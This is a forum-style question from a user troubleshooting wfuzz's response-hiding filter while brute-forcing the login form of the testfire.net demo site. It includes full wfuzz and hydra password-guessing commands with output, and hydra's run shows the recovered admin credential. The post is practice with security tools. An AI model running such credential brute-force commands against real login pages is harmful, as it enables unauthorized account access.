wfuzz show –hs responses when it should hide it

Test site: http://testfire.net/login.jsp

Error when login failed: Login Failed: We're sorry, but this username or password was not found in our system. Please try again.

Web Form

<form action="doLogin" method="post" name="login" id="login" onsubmit="return (confirminput(login));">           <table>             <tbody><tr>               <td>                 Username:               </td>               <td>                 <input type="text" id="uid" name="uid" value="" style="width: 150px;">               </td>               <td>               </td>             </tr>             <tr>               <td>                 Password:               </td>               <td>                 <input type="password" id="passw" name="passw" style="width: 150px;">                 </td>             </tr>             <tr>                 <td></td>                 <td>                   <input type="submit" name="btnSubmit" value="Login">                 </td>               </tr>           </tbody></table>         </form> 

The actual password is admin too. Therefore, I created simple passlist.txt for this purpose.

wolf@linux:~$   cat passlist.txt  admin pwd pass password wolf@linux:~$    

wfuzz flag

--ss/hs regex             : Show/Hide responses with the specified regex within the content 

Here are few tests, but none of them really work.

wfuzz -cz file,passlist.txt –hs Failed -d “uid=admin&passw=FUZZ&btnSubmit=Login” http://testfire.net/doLogin

wolf@linux:~$   wfuzz -cz file,passlist.txt --hs Failed -d "uid=admin&passw=FUZZ&btnSubmit=Login" http://testfire.net/doLogin  Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.  ******************************************************** * Wfuzz 2.4.5 - The Web Fuzzer                         * ********************************************************  Target: http://testfire.net/doLogin Total requests: 4  =================================================================== ID           Response   Lines    Word     Chars       Payload                                                                           ===================================================================  000000003:   302        0 L      0 W      0 Ch        "pass"                                                                            000000004:   302        0 L      0 W      0 Ch        "password"                                                                        000000001:   302        0 L      0 W      0 Ch        "admin"                                                                           000000002:   302        0 L      0 W      0 Ch        "pwd"                                                                              Total time: 0.517212 Processed Requests: 4 Filtered Requests: 0 Requests/sec.: 7.733766  wolf@linux:~$    

wfuzz -cz file,passlist.txt –hs Failed -d “uid=admin&passw=FUZZ&btnSubmit=Login” http://testfire.net/login.jsp

wolf@linux:~$   wfuzz -cz file,passlist.txt --hs Failed -d "uid=admin&passw=FUZZ&btnSubmit=Login" http://testfire.net/login.jsp  Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.  ******************************************************** * Wfuzz 2.4.5 - The Web Fuzzer                         * ********************************************************  Target: http://testfire.net/login.jsp Total requests: 4  =================================================================== ID           Response   Lines    Word     Chars       Payload                                                                           ===================================================================  000000003:   200        194 L    582 W    8519 Ch     "pass"                                                                            000000001:   200        194 L    582 W    8519 Ch     "admin"                                                                           000000002:   200        194 L    582 W    8519 Ch     "pwd"                                                                             000000004:   200        194 L    582 W    8519 Ch     "password"                                                                         Total time: 0.583132 Processed Requests: 4 Filtered Requests: 0 Requests/sec.: 6.859507  wolf@linux:~$    

It didn’t work even thought the right user/pass combination was there.

Any idea what’s wrong in this wfuzz syntax?

hydra can do this without any problem and identified the credential accurately.

wolf@linux:~$   hydra testfire.net http-post-form \ > '/doLogin:uid=^USER^&passw=^PASS^&btnSubmit=Login:Login failed' \ > -l admin -P passlist.txt -V Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.  Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-06-08 08:57:36 [DATA] max 4 tasks per 1 server, overall 4 tasks, 4 login tries (l:1/p:4), ~1 try per task [DATA] attacking http-post-form://testfire.net:80/doLogin:uid=^USER^&passw=^PASS^&btnSubmit=Login:Login failed [ATTEMPT] target testfire.net - login "admin" - pass "admin" - 1 of 4 [child 0] (0/0) [ATTEMPT] target testfire.net - login "admin" - pass "pwd" - 2 of 4 [child 1] (0/0) [ATTEMPT] target testfire.net - login "admin" - pass "pass" - 3 of 4 [child 2] (0/0) [ATTEMPT] target testfire.net - login "admin" - pass "password" - 4 of 4 [child 3] (0/0) [80][http-post-form] host: testfire.net   login: admin   password: admin 1 of 1 target successfully completed, 1 valid password found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-06-08 08:57:39 wolf@linux:~$